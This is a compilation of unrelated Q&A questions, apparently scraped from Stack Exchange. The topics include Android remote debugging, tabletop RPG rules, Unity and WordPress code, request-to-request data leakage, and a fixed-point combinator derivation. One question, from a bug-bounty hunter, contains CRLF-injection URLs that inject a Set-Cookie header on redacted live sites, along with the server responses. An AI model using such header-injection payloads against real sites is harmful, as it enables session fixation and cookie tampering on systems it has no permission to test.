Remote debugging android app from another computer on different network

Is is it possible for Android development to remote debug an app from another network? I am not talking about WebView/Web Pages debugging but as stated here, as this page talks about remote debugging a WebView or web pages opened in any app and also I don’t think it will work on if device and computer are on different networks.

My scenario is that if Device A is connected to Computer A on Wifi A and I want to debug the app running on Device A from Computer B on Wifi B.

There is option to connect your device using the ADB wireless debugging using TCP-IP, but that requires the Device and Computer to be on the same network, but in my case device and computer are on another network.

Cookie is not being set after CRLF Injection in one domain but set in another domain. How can i bypass/set it?

Ok i am facing a very weird behaviour that sets and doesnt set cookie both. So, first i have found CRLF injection in 2 domains, redacted.de and redacted_another.com. When i go to redacted_another.com vulnerable url, the cookie gets set into firefox-esr. This works in browser. There first vulnerable domain i encountered had this url:

https://www.redacted_another.com/lp/%0ASet-Cookie:%20dipesh=yadav

I can view cookies using developers tool. This is default behaviour as i think. The next domain i encountered had this vulnerable urls but it didnt work in browser 🙁 :

http://www.redacted.de/forum/%0aSet-Cookie:%20dipesh=yadav http://www.redacted.de/sso/registration/account/%3f%0d%0aSet-Cookie:%20dipesh=yadav 

But when i visit this any urls from redacted.de it doest work in browser. Also, both redacted_another.com and redacted.de sets cookie in curl response. This is what it looks like for both redacted but the first one works in browser and second doesnt in browser. Working Curl request:

root@kali-linux:~/redacted/# http https://www.redacted.com/lp/%0ASet-Cookie:%20dipesh=yadav  HTTP/2 301  date: Thu, 13 Aug 2020 15:02:53 GMT content-type: text/html content-length: 185 location: https://www.redacted.com/lp/redirects/?olp=/lp/ set-cookie: dipesh=yadav expires: Thu, 20 Aug 2020 15:02:53 GMT cache-control: max-age=604800  HTTP/2 200  date: Thu, 13 Aug 2020 15:02:53 GMT content-type: text/html content-length: 1452 vary: Accept-Encoding last-modified: Tue, 04 Feb 2020 15:54:26 GMT etag: "redacted" expires: Thu, 20 Aug 2020 15:02:53 GMT cache-control: max-age=604800 access-control-allow-origin: * accept-ranges: bytes 

NOT WORKING REQUEST:

root@kali-linux:~/redacted# http http://www.redacted.de/sso/registration/account/%0aSet-Cookie:%20bugbounty=bugbountyplz  HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 13 Aug 2020 15:05:04 GMT Content-Type: text/html Content-Length: 162 Location: https://www.redacted.de/sso/registration/account/ Set-Cookie: bugbounty=bugbountyplz Last-Modified: Thu, 13 Aug 2020 15:05:04 GMT Cache-Control: private Age: 0 X-Frame-Options: DENY X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Connection: keep-alive  HTTP/2 200  server: nginx date: Thu, 13 Aug 2020 15:05:05 GMT content-type: text/html; charset=UTF-8 vary: Accept-Encoding access-control-allow-credentials: true access-control-allow-origin: https://www.redacted.de last-modified: Thu, 13 Aug 2020 15:05:05 GMT cache-control: no-cache, private age: 0 strict-transport-security: max-age=15768000 x-frame-options: DENY x-xss-protection: 1; mode=block x-content-type-options: nosniff accept-ranges: bytes  

Can anyone help me with this? Whats the problem that doesnt letme set cookie in redacted.de but i can set cookie in redacted_another.com.

What happens if a thin-blood diablerizes another vampire?

Let’s say that a thin-blood has diablerized another vampire who isn’t a thin-blood, so it is now a 13th generation vampire of the clan of their victim.

What happens to their learned disciplines (via Discipline Affinity) and the Thin-blood Alchemy?

And now, let’s suppose that the thin-blood diablerizes another thin-blood, what will happen (idem, from disciplines and Thin-blood Alchemy point of view)?

Is a creature’s Innate Spellcasting save DC affected by changing ability scores or adding Spellcasting features from another creature?

I’m creating a Svirfneblin Evil Mage by combining the stat blocks for each Evil Mage and Svirfneblin.

A Svirfneblin’s Innate Spellcasting Save DC is 11 and its INT is +1. An Evil Mage’s Spellcasting Save DC is 13 and its INT is +3.

I’m taking the abilities from Evil Mage and Svirfneblin and taking the higher ability scores (and modifiers), does the increased INT modifier from the Evil Mage’s score affect the Innate Spellcasting spell save DC?

How do i make a reference to another game manager? Not game object

I made a reference here but the drop down list in script seems to not contain the variables from another script

 [SerializeField] private gm MainPlatform;  public Transform SidePlatform; private Vector3 NextSpawnSidePlatform; void Start() {     MainPlatform = GameObject.FindWithTag("gameManager").GetComponent<gm>();     NextSpawnSidePlatform.x = 30.5f;     StartCoroutine(SpawnSidePlatform()); } 

What is the term for data leaking from one HTTP request to another and how to prevent it?


Context

We recently added a feature that used a library whose API we misunderstood. Long story short, if user A sends a request to our web application, the library caches some result, and that result may show in a response to user B’s request. Needless to say, this is a security bug, specifically, data from user A leaks to user B.

Although it is well-known that web application should be stateless, the long dependency graph of such application makes the likelihood of some downstream library (or its bad usage) accidentally leaking data between requests non-zero. I can imagine this bug is possible with a wide range of web frameworks and environments (e.g., Django, .NET, NodeJS, AWS Lambda), since they all reuse the application between request to avoid cold starts.

Questions

  1. What is the proper term for data leaking server-side between HTTP requests, due to an honest developer mistake? Terms such as session hijacking and session fixation seem to refer exclusively to malicious attacks.

  2. Are there tools and method to test for such mistakes or detect them in production?

I created a magic item for one character and another character took it

I’m DMing for a group of friends, and they rolled really high stats… except for the dragonborn warlock who ended up with a Constitution of 6 (-2). (We did use 4d6 drop lowest… the warlock was just really unlucky.)

Now that all the characters are third level, he only about half the hit points of the other characters. With that in mind, I put into an adventure a magic amulet that increases the wearer’s Constitution modifier to +2.

Before the warlock could find the amulet, though, the party’s rogue took and kept it. I don’t want to kill the rogue’s character over this: His personality trait is ‘I see treasure and I take it’ the only way I’ve found this being role-played is after the battle and looting bodies or the environment, opening crates barrels etc. (It’s possible this is the player being a jerk, but I don’t know if I should hold the player accountable for his “character’s” actions.)

The rogue also sometimes asks—demands, really—extra XP for killing the first monster or for killing the most monsters, and mostly I say no. When I do say yes, it’s a small amount like 25 XP. The rogue has plenty of treasure, by the way, including his own unique magic item.

When I told the rogue’s player that the amulet was for the dragonborn, he said, “Oh, well! Finders keepers!”

I’m thinking of a having a monster or NPC just take the amulet, or maybe offering to trade the amulet for another seemingly more powerful (but actually cursed) magic item.

How should I continue?

How to go from add_submenu_page to another page

hello everyone i’m going from procedural php to objects, i was asking myself a question, once i created my plugin that gives me the possibility to have in the wp dashboard a quick view of a section through add_menu_page, and created sub-items add_submenu_page, I am inside this page,

function secondo_menu_sottomenu(){     echo '<div class="wrap"><div id="icon-options-general" class="icon32"><br></div>         <h2>PRIMO SOTTOMENÙ</h2></div>                  <!--Card--> <div id="test" class="card card-cascade narrower mb-4" style="margin-top: 28px;cursor: pointer;">     <!--Card image-->     <div class="view view-cascade">          <a>             <div class="mask rgba-white-slight"></div>         </a>     </div>     <!--/.Card image-->     <!--Card content-->     <div class="card-body card-body-cascade">         <h5 style="font-weight: 500;font-size: 17px;">             TEST         </h5>         <small>N° TEST</small>     </div>     <!--/.Card content--> </div> <!--/.Card--> <script type="text/javascript">     document.getElementById("test").setAttribute(\'onclick\', \'location.href = "test.php"\'); </script>         '; } 

now I would like to go to a page called test.php, but how do I create it?

I mean imagine you have the dashboard page, then the users section, and inside users, I want to create a page called registered users and see all registered users, this is what I want to explain.

in procedural I would have created:

home.php user.php

and in user.php a link to alluser.php

how do I create the test.php is there an add_page-like instruction?

Tried to derive the Z combinator and instead derived another

I was working to derive the Z-Combinator by starting with the factorial function and ended up deriving a different fixed-point combinator. What did I derive? Did I make a subtle mistake?

Here are the steps I performed (in JavaScript)

1. Declare factorial function

let fact = n =>     n < 2 ? 1 : n * fact(n - 1) 

2. Convert to combinator (closed expression)

let fact = (self, n) =>     n < 2 ? 1 : n * self(n - 1) 

3. Thread self call

Based on signature fact(?, 7), passing fact as first argument seems reasonable fact(fact,7). So thread the parameter through the tail call:

let fact = (self, n) =>     n < 2 ? 1 : n * self(self, n - 1) 

Usage is now fact(fact,7)5040

4. Refactor to curried form

let fact = self =>     n => n < 2 ? 1 : n * self(self)(n - 1) 

5. Move self application to local declaration

let fact = self => {     let f = n => self(self)(n)     return n => n < 2 ? 1 : n * f(n - 1) } 

6. Convert let declaration to lambda expression

let fact = self =>     (f =>         n => n < 2 ? 1 : n * f(n - 1)     )(         n => self(self)(n)     ) 

Usage is still fact(fact)(7)5040

7. Separate the factorial expression

let _fact = f => n =>     n < 2 ? 1 : n * f(n - 1)  let fact = self =>     (         _fact     )(         n => self(self)(n)     ) 

8. Move self-application from caller to body

let _fact =     f => n => n < 2 ? 1 : n * f(n - 1)  let fact = (() => {     let innerFact = self =>         (             _fact         )(             n => self(self)(n)         )     return innerFact(innerFact) })() 

Usage is now fact(7)5040

9. Convert let declaration to lambda expression

let _fact =     f => n => n < 2 ? 1 : n * f(n - 1)  let fact = (() => {     return (         innerFact => innerFact(innerFact)     )(         self => (_fact)(n => self(self)(n))     ) })() 

10. Simplify expression

let _fact =     f => n => n < 2 ? 1 : n * f(n - 1)  let fact =     (innerFact => innerFact(innerFact))     (self => (_fact)(n => self(self)(n))) 

Sanity check. Usage is still fact(7)5040

11. Rename variables

The usage of innerFact and self look suspiciously similar. Rename to the same variable to discover a pattern. Separate lexical scopes so safe to do:

let _fact =     f => n => n < 2 ? 1 : n * f(n - 1)  let fact =     (u => u(u))     (u => (_fact)(n => u(u)(n))) 

12. Abstract _fact usage and rename fact

Rename fact to setup and abstract _fact in body by replacing with parameter f

let _fact =     f => n => n < 2 ? 1 : n * f(n - 1)  let setup = f =>     (u => u(u))     (u => (f)(n => u(u)(n)))  let fact = setup(_fact) 

No need for separate _fact declaration so inline:

let setup = f =>     (u => u(u))     (u => (f)(n => u(u)(n)))  let fact = setup(     f => n => n < 2 ? 1 : n * f(n - 1) ) 

13. Rename setup

Rename it to what? What combinator is this? According to Wikipedia The Z combinator is:

let Z = f =>      (u => f(v => u(u)(v)))     (u => f(v => u(u)(v))) 

But what I’ve derived is:

let setup = f =>     (u => u(u))     (u => (f)(n => u(u)(n))) 

Defining fact in terms of either seems equivalent in behavior. Did I make a mistake? Did I accidentally rediscover another well-known combinator?